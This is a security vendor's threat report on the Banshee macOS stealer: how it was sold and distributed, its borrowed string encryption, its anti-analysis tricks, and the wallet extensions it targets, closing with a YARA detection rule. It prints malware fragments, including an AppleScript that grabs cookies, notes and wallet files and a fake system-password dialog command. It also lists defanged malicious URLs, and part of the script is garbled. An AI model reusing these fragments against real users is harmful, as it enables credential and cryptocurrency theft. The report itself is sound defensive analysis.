**Research by:** Antonis Terefos ( **@Tera0017**)
As of 2024, approximately 100.4 million people worldwide use macOS, accounting for 15.1% of the global PC market. Of the millions of macOS users, many falsely assume that their systems are inherently secure from malware. This perception stems from macOS’s Unix-based architecture and historically lower market share, making it a less attractive target for cyber criminals. While macOS includes robust security measures like Gatekeeper, XProtect, and sandboxing, no operating system is entirely immune to threats, making users’ false sense of security all the more dangerous.
As macOS’s popularity grows, attackers increasingly target the platform. Modern threats include sophisticated malware, phishing attacks, and malicious software like **Banshee**, a stealthy macOS stealer, a new stealer that was made public for the first time in July 2024. This malware targets MacOS users and is able to steal browser and login credentials, cryptocurrency wallets, and sensitive information from files. Through July to November, Banshee’s author operated a stealer-as-a-service on Telegram and on dark web forums such as XSS and Exploit and continued to improve the malware. During this time, the author hired two members to carry out campaigns targeting MacOS users.
In late September, **Check Point Research** identified a new, undetected version of Banshee Stealer targeting macOS. This updated version introduced string encryption, as previous versions contained all the strings in plain text. However, Banshee’s author “stole” the string encryption algorithm from Apple’s MacOS XProtect antivirus engine. Threat actors distributed this new version mainly via phishing websites and malicious GitHub repositories. In some GitHub campaigns, threat actors targeted both Windows and MacOS users with Lumma and Banshee Stealer.
For over two months, this updated version of Banshee successfully evaded detection by most antivirus engines until its original code was leaked on XSS forums, allowing antivirus engines to detect its core functionality. Once the source code was leaked, the Banshee stealer-as-a-service operation was shut down to the general public. However, **Check Point Research** continues to observe campaigns distributing malware through phishing websites that masquerade as legitimate software.
In late September, **Check Point Research** obtained new versions of **Banshee Stealer**. The discovered samples remained undetected by antivirus engines on **VirusTotal** for over two months. Only once the Banshee Stealer **source code** was leaked on **November 23** on **XSS underground forums** did antivirus vendors update their detection rules to identify both the original leaked code and any updated versions.
Although the core functionality of both the older and newer versions remains unchanged, one key difference is the introduction of string encryption, which replaces the plain text strings from samples reported in August. When **Check Point Research** first obtained encrypted samples in late September, we created a Yara rule based on the string encryption, resulting in many false positives. However, upon further investigation, we discovered that Banshee employs the same encryption method that Apple utilizes in macOS for string encryption within its antivirus engine, XProtect. As previously noted by a researcher, this same encryption is used for _“encrypted YARA rules stored within the XProtect Remediator binaries”_.
Python representation:
“`
def macos_xprotect_string_decryption(encrypted: bytes, encr_key: int) -> str: “”” Author: @Check Point Research Decrypts MacOS Xprotect binaries & Banshee Stealer encrypted strings. “”” decrypted = “”.join( chr( (encr_key >> ((i * 8) & 0x38) & 0xFF) ^ encrypted[i] ) for i in range(len(encrypted)) ) return decrypted.partition(“\x00”)[0]
“`
While **XProtect** binaries decrypt YARA rules for detection purposes, **Banshee Stealer** uses the same algorithm to decrypt critical strings for its functionality. These strings include:
Upon decrypting the strings, we observed that Banshee’s core functionality remains largely unchanged. The updates primarily pertain to the additional anti-analysis techniques. The first technique uses the `fork()` function, which creates a child process that may escape debuggers attached to the parent process. Before the parent process terminates, it runs the command `killall Terminal` to close any open terminal sessions. Meanwhile, the child process calls `setsid()` to initiate a daemon in the background, trying to mimic a legitimate system service and blend in with normal processes. Then, a second child process is created, while the first child is terminated. The final child process attempts to get `rwx` access to the root directory, and if it fails, it will stop the malware infection; if it succeeds, it closes `stdin`, `stdout`, and `stderr` and redirects them to `/dev/null`. This ensures that the malware runs silently without producing output or errors that could alert the user of malicious behavior. This also prevents any interaction with debugging tools that might monitor input/output behavior.
Once those checks have been passed, **Banshee** proceeds by retrieving the **HOME** and **TMP** directories and creating a ten-character directory within **TMP**. These directories are used to steal user information, browser data, and as for the created directory, to store the stolen data. At this stage, the malware functions similarly to the leaked code and previous versions. However, one notable change in the updated code is the removal of the language check, which previously terminated the process if Russian was detected.
**Banshee** is a fully functional stealer capable of stealing credentials from several browsers, including:
In addition to browser credentials, the malware targets various browser extensions, primarily those related to cryptocurrency wallets. It also targets a Two-Factor Authentication (2FA) extension `authenticator.cc—Authenticator`. All stolen data is stored in the directory `/tmp/$rand10char_dir/Browsers/`. Interestingly, some of these extensions no longer appear to exist, leading us to believe that the end-of-life extensions have been copied and pasted from previous or other “stealer” projects. Banshee is targeting the following browser extensions.
“`
bhghoamapcdpbohphigoooaddinpkbai // “authenticator.cc – Authenticator” fhbohimaelbohpjbbldcngcnapndodjp // “BNB Chain Wallet” fihkakfobkmkjojpchpfgcmhfjnmnfpi // “BitAppWallet” aodkkagnadcbobfpggfnjeongemjbjca // “BoltX” aeachknmefphepccionboohckonoeemg // “coin98.com – Coin98 Wallet” hnfanknocfeofbddgcijnmhnfnkdnaad // “wallet.coinbase.com – Coinbase Wallet extension” agoakfejjabomempkjlepdflaleeobhb // “core.app – Core | Crypto Wallet & NFT Extension” pnlfjmlcjdjgkddecgincndfgegkecke // “Cocobit” blnieiiffboillknjnepogjhkgnoapac // “Equal” cgeeodpfagjceefieflmdfphplkenlfk // “broxus.com EVER Wallet” aholpfdialjgjfhomihkjbmgjidlcdno // “exodus.com – Exodus Web3 Wallet” ebfidpplhabeedpnhjnobghokpiioolj // “fewcha.app – Fewcha Move Wallet” cjmkndjhnagcfbpiemnkdpomccnjblmj // “koii.network – Finnie” hpglfhgfnhbgpjdenjgmdgoeiappafln // “Guarda” nanjmdknhkinifnkgdcggcfnhdaammmj // “GuildWallet” fnnegphlobjdpkhecapkijjdkgcjhkib // “Harmony Chrome Extension Wallet” flpiciilemghbmfalicajoolhkkenfel // “icon.foundation – ICONex” cjelfplplebdjjenllpjcblmjkfcffne // “Jaxx Liberty” jblndlipeogpafnldhgmapagcccfchpi // “Kaia Wallet” pdadjkfkgcafgbceimcpbkalnfnepbnk // “KardiaChain Wallet” dmkamcknogkgcdfhhbddcghachkejeap // “keplr.app – Keplr” kpfopkelmapcoipemfendmdcghnegimn // “Liquality Wallet” nlbmnnijcnlegkjjpcfjclmcfggfefdm // “MEW CX” dngmlblcodfobpdpecaadgfbcggfjfnm // “multiversx.com – MultiversX Wallet” efbglgofoippbgcjepnhiblaibcnclgk // “martianwallet.xyz – Martian Aptos & Sui Wallet Extension” afbcbjpbpfadlkmhmclhkeeodmamcflc // “mathwallet.org – MathWallet” nkbihfbeogaeaoehlefnkodbefgpgknn // “metamask.io – MetaMask” ejbalbakoplchlghecdalmeeeajnimhm // “MetaMask” fcckkdbjnoikooededlapcalpionmalo // “mobox.io – MOBOX WALLET” lpfcbjknijpeeillifnkikgncikgfhdo // “Nami” jbdaocneiiinmjbjlgalhcelgbejmnid // “Guarda” fhilaheimglignddkjgofkcbgekhenbh // “oxygen.solutions – Oxygen – Atomic Crypto Wallet” mgffkfbidihjpoaomajlbgchddlicgpn // “Pali Wallet” ejjladinnckdgjemekebdpeokbikhfci // “petra.app – Petra Aptos Wallet” bfnaelmomeimhlpmgjnjophhpkkoljpa // “phantom.app – Phantom” phkbamefinggmakgklpkljjmgibohnba // “pontem.network – Pontem Crypto Wallet – Eth, Sol, BTC +” fnjhmkhhmkbjkkabndcnnogagogbneec // “Ronin Wallet” lgmpcpglpngdoalbgeoldeajfclnhafa // “safepal.com – SafePal Extension Wallet” nkddgncdjgjfcddamfgcmfnlhccnimig // “GuildWallet” pocmplpaccanhmnllbbkpgfliimjljgo // “Slope Wallet” bhhhlbepdkbapadjdnnojkbgioiodbic // “solflare.com – Solflare Wallet” fhmfendgdocmcbmfikdcogofphimnkno // “sollet” mfhbebgoclkghebffdldpobeajmbecfk // “westar.io – StarMask” cmndjbecilbocjfkibfbifhngkdmjgog // “swashapp.io – Swash” ookjlbkiijinhpmnjffcofjonbfbgaoc // “Temple – Tezos Wallet” aiifbnbfobpmeekipheeijimdpnlpgpp // “Station Wallet” mfgccjchihfkkindfppnaooecgfneiii // “tokenpocket.pro – TokenPocket – Web3 & Nostr Wallet” nphplpgoakhhjchkkhmiggakijnkhfnd // “TON Wallet” ibnejdfjmmkpcnlpebklmnkoeoihofec // “TronLink” egjidjbpglichdcondbcbdnbeeppgdph // “trustwallet.com – Trust Wallet” amkmjjmmflddogmhpjloimipbofnfjih // “Wombat – Gaming Wallet for Ethereum & EOS” hmeobnfnfcmdkdcmlblgagmfpfboieaf // “xdefi.io – XDEFI Wallet” eigblbgjknlfbajkfhopmcojidlgcehm // “XMR.PT” bocpokimicclpaiekenaeelehdjllofo // “XDCPay” ffnbelfdoeiohenkjibnmadjiehjhajb // “yoroiwallet.com – Yoroi” kncchdigobghenbbaddojjnnaogfppfj // “iWallet”
“`
Once the browser data is dumped, Banshee proceeds to target wallets found on the machine. The stolen information is stored `/tmp/$rand10char_dir/Wallets/`. The targeted wallets are:
The stealer collects various system information, including:
`system_profiler SPSoftwareDataType SPHardwareDataType` `api.ipify.orgvia the command` `curl -s` `osascript -e \’display dialog “To launch the application, you need to update the system settings \n\nPlease enter your password.” with title “System Preferences” with icon caution default answer “” giving up after 30 with hidden answer\’` `dscl /Local/Default -authonly `
This information is stored in `/tmp/$rand10char_dir/system_info.json` which also includes the campaign ID under the key `”BUILD_ID:”`.
The keychain passwords are stored in `/tmp/$rand10char_dir/Passwords/` and the code responsible for this functionality has remained unchanged since the leaked code.
The file-grabber functionality is performed using an AppleScript. The script is stored at `/tmp/$rand13char`. The code executed is shown below, with the output being stored at `/tmp/$rand10char_dir/FileGrabber/`.
“`
do shell script “osascript -e ‘set volume with output muted'”; set baseFolderPath to (path to home folder as text) & ” :”; set fileGrabberFolderPath to baseFolderPath & “FileGrabber:”; set notesFolderPath to baseFolderPath & “Notes:”; tell application “Finder”; set username to short user name of (system info) if not (exists folder baseFolderPath) then; do shell script “echo ‘Creating base folder'”; make new folder at (path to home folder) with properties {name:” }; end if try; do shell script “echo ‘Creating FileGrabber folder'”; make new folder at folder baseFolderPath with properties {name:”FileGrabber”}; delay 2 — Delay to give Finder time to create the folder; end try try; do shell script “echo ‘Creating Notes folder'”; make new folder at folder baseFolderPath with properties {name:”Notes”}; delay 2 — Delay to give Finder time to create the folder; end try try; do shell script “echo ‘Copying Safari cookies'”; set macOSVersion to do shell script “sw_vers -productVersion”; if macOSVersion starts with “10.15” or macOSVersion starts with “10.14” then; set safariFolder to ((path to library folder from user domain as text) & “Safari:”); else; set safariFolder to ((path to library folder from user domain as text) & “Containers:com.apple.Safari:Data:Library:Cookies:”); end if; duplicate file “Cookies.binarycookies” of folder safariFolder to folder fileGrabberFolderPath with replacing; delay 2 — Delay to give Finder time to copy the file; end try try; do shell script “echo ‘Copying Notes database'”; set homePath to path to home folder as string; set sourceFilePath to homePath & “Library:Group Containers:group.com.apple.notes:NoteStore.sqlite”; duplicate file sourceFilePath to folder notesFolderPath with replacing; delay 2 — Delay to give Finder time to copy the file; end try; set extensionsList to {“txt”, “docx”, “rtf”, “doc”, “wallet”, “keys”, “key”} try; do shell script “echo ‘Gathering desktop files'”; set desktopFiles to every file of desktop; repeat with aFile in desktopFiles; try; set fileExtension to name extension of aFile; if fileExtension is in extensionsList then; set fileSize to size of aFile; if fileSize Download for Windows Download for macOS
“`
The second **Banshee stealer** campaign ID was `K1WDRRD8E2dHM7i2WFSHyN4DKG3v7q`, and the C&C was unchanged. Last time checked (December 10), the repositories still spread malware and remain undetected despite the fact that the `.dmg` file is unzipped and not password protected.
The **third campaign** took place around November 3rd and targeted **Windows** and **MacOS** users as well. The **Mac** release `Soft.Install.v1.4.zip` contained `Installer.dmg (Installer)` which carried the malware. The Bot communicated with the same C&C as the previous campaign but with ID `KAriWgOCQrqvyRSnPOnaE6UUBWjELA`. The **Lumma Stealer** release `ExtraModes_v1.6.zip (Setup.exe)` had nine C&C servers with tld `.site` , while further endpoints were hosted on Steam. The threat actor behind this campaign uses two stealers in his arsenal: Lumma to target Windows and Banshee to target MacOS.
Almost all repositories were created before they started pushing malware. The releases hosted two archives, one targeting Windows and the other MacOS.
**Check Point Research** successfully obtained multiple files from the new version of the **Banshee** Stealer which introduced string encryption for the first time on September 26th. Since then, we observed over 26 campaigns. Three of them were distributed via GitHub, though there may be more that have yet to be identified. The remaining campaigns appear to use different distribution methods. However, based on the filenames of the obtained files, they still impersonate popular software such as Chrome, TradingView, Zegent, Parallels, Solara, CryptoNews, MediaKIT, and Telegram.
**Check Point Research** collected all the samples, extracted the campaigns and the command and control servers, and obtained the file names masquerading as popular software. By generating the node graph below, we can distinguish two major clusters, primarily separated based on the distribution methods. The first major cluster, with C&C `41[.]216.183.49`, possibly distributed most of the Banshee stealer campaigns through malicious repositories commonly using filenames such as “Setup”, “Installer” and “Update”. The second cluster consists of multiple linked command and control servers that share the same “software” names, maintaining consistency across various campaigns and changes to the command and control servers.
One recent campaign from the second cluster, observed on December 3, impersonates a fake Telegram chat through a phishing website, directing the user to download a file. The website retrieves the User-Agent from the request and, if the machine is MacOS, provides the download link and instructions to install it. When visiting the phishing website with Windows or Linux User-Agents, the malicious download link is not displayed. The malicious file is downloaded from `hxxps://api7[.]cfd/testet123t/Telegram.dmg`.
The HTML files `index.html` as well as `mobile.html` contain no other malicious functionality except to report back via `sendNotification.php` to the threat actor that a user visited the phishing page. While `mac.html` provides the victim with the malicious link to download Banshee. JavaScript code handling the User-Agent is shown below:
“`
“`
In this case, the threat actor is not performing dual infections on MacOS and Windows users and is clearly only interested in victims using the first one. How a victim arrives at the phishing website is currently unclear; however, users seeking to download cracked or tools from illegitimate sources are the target of such attacks. Similar phishing websites have been found distributing constantly updated `.dmg` files, as shown by the URLs and corresponding filenames below:
“`
– Telegram.dmg hxxp://api7[.]cfd/testet123t/
– TradingView.dmg hxxps://coincapy[.]com/zx/
– MediaKIT.dmg hxxps://fotor[.]software/MediaKIT
– Contract.dmg hxxps://fotor[.]software/MacOS/Collaboration
“`
Even though the Banshee stealer-as-a-service business has closed, threat actors are still using the updated versions of the service and performing new campaigns targeting MacOS users. It is unclear whether the remaining campaigns originate from previous customers or if the creator of Banshee is continuously updating the source code and using the malware as part of the private group hired in XSS to conduct MacOS campaigns.
On July 18, `@kolosain` created a Telegram channel and began selling the Banshee stealer for $2,999. Then, between August 13 and 15, the account `@0xe1`, the same actor behind the Telegram channel ( `@kolosain`), published on XSS and Exploit forums offering the Banshee MacOS stealer as a service to a broader audience for a discounted price of $1,500 per month.
Between August 26 and 28, `@0xe1` started recruiting members for a small private group that would operate and perform campaigns. The seller offered the Banshee stealer and support to bypass Antivirus engines, starting with a 50% profit share for affiliates, which later increased to 60-65%. The recruitment was limited to only two spots, and `@0xe1` was searching for skilled actors with experience.
**Check Point Research** discovered the first version of Banshee Stealer using this new string encryption algorithm on September 26. Since then, campaigns using the old version have not been observed. On October 17, the author posted on XSS trying to sell the entire project for 1BTC. Soon after, the price dropped to $30.000. The timing suggests that the author may have been aware that the original source code had been leaked and was trying to quickly sell the project to make some quick cash.
Throughout this entire time, from October 10 to November 14, the stealer received updates which can be seen by posts on the Banshee forums.
By November 24, the author decided to close the service since the original source code of the Banshee Stealer was leaked the previous day. Since then, we discovered multiple campaigns mostly distributed through phishing websites. It is unclear if those campaigns are performed by the remaining customers or the author’s private group.
Shortly after the code leak, antivirus engines started detecting even the newest versions of Banshee, which included string encryption and new anti-analysis techniques. While this leak may help improve detection, it also poses the risk of creating multiple forks and new versions of Banshee being developed and distributed by different actors.
This relatively small code update of string encryption introduced by the developer of Banshee caused most antivirus engines to fail to detect this dangerous macOS infostealer for over two months. This illustrates the growing trend of threat actors targeting macOS users as well as the expansion of their arsenal and capabilities with malware and tools for different operating systems.
Malicious repositories on GitHub which primarily target Windows users, have gradually extended their reach to macOS, Linux, and Android platforms. The surge in infections among Windows users led threat actors to replicate their attack chain for macOS, broadening the scope of the threat across multiple operating systems. While Windows-based malware was often distributed via password-protected archives on GitHub to evade detection, macOS disk image files (DMG) and unprotected archives were openly shared on the platform.
Despite macOS traditionally being regarded as more secure, Banshee’s success demonstrates the importance for macOS users to remain vigilant. It is crucial for security solutions to evolve and provide better protection against increasingly sophisticated attacks as threat actors continue to expand their reach.
Operating systems and applications must be updated with timely patches and other means to mitigate the risks of threats like Banshee Stealer. Individuals should exercise caution when dealing with unexpected emails or messages containing links, particularly from unknown senders. Enhancing cybersecurity awareness among employees is also crucial, as it fosters a vigilant workforce. Lastly, consulting security specialists for any uncertainties can provide valuable expertise and guidance in navigating potential security challenges.
“`
private rule macos_binary { meta: author = “Antonis Terefos @Tera0017/@Check Point Research” descr = “MacOS file format” condition: uint32(0) == 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xBEBAFECA } rule banshee_macos { meta: author = “Antonis Terefos @Tera0017/@Check Point Research” descr = “Banshee MacOS stealer, encrypted strings version” sha256 = “ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038” strings: // x64 $x64_code_str_decr1 = {80 E1 ?? (48| 49) 89 (DE| F0| FE) (48| 49) D3 (EE| E8) (40| 44) 30 ?? 48 83 C2 08} $x64_code_str_decr12 = {0B 09 7D 92 2B 25 CB 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38} $x64_code_str_decr2 = {48 89 ?? 48 D3 [1-2] 30 ?? 48 83 C1 08 48 FF C?} $x64_code_str_decr3 = {81 30 [4] C6 40 04 00} $x64_code_str_decr4 = {2B 25 C8 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91} $x64_code_campid = {88 14 08 8A 54 31 02 48 FF C1 48 83 F9 1D} $x64_code_gen1 = {C6 40 09 00 31 C9 8A 14 08} $x64_code_gen2 = {88 14 31 8A 54 30 02 48 FF C6 84 D2} $x64_code_gen3 = {72 00 77 00 [30] 00 3B 00 00} // Arm $arm_code_str_decr1 = {0B 09 7D 92 2B 25 CB 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91} $arm_code_str_decr2 = {2B 25 C8 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91} $arm_code_campid = {6C 01 09 8B 0A 69 29 38 8A 05 40 39 29 05 00 91 3F 79 00 F1} $arm_code_gen1 = {1F 24 00 39 08 00 80 D2} $arm_code_gen2 = {72 00 77 00 [30] 00 3B 00 00} condition: macos_binary and 6 of ($x64_code*) or all of ($arm_code*) }
“`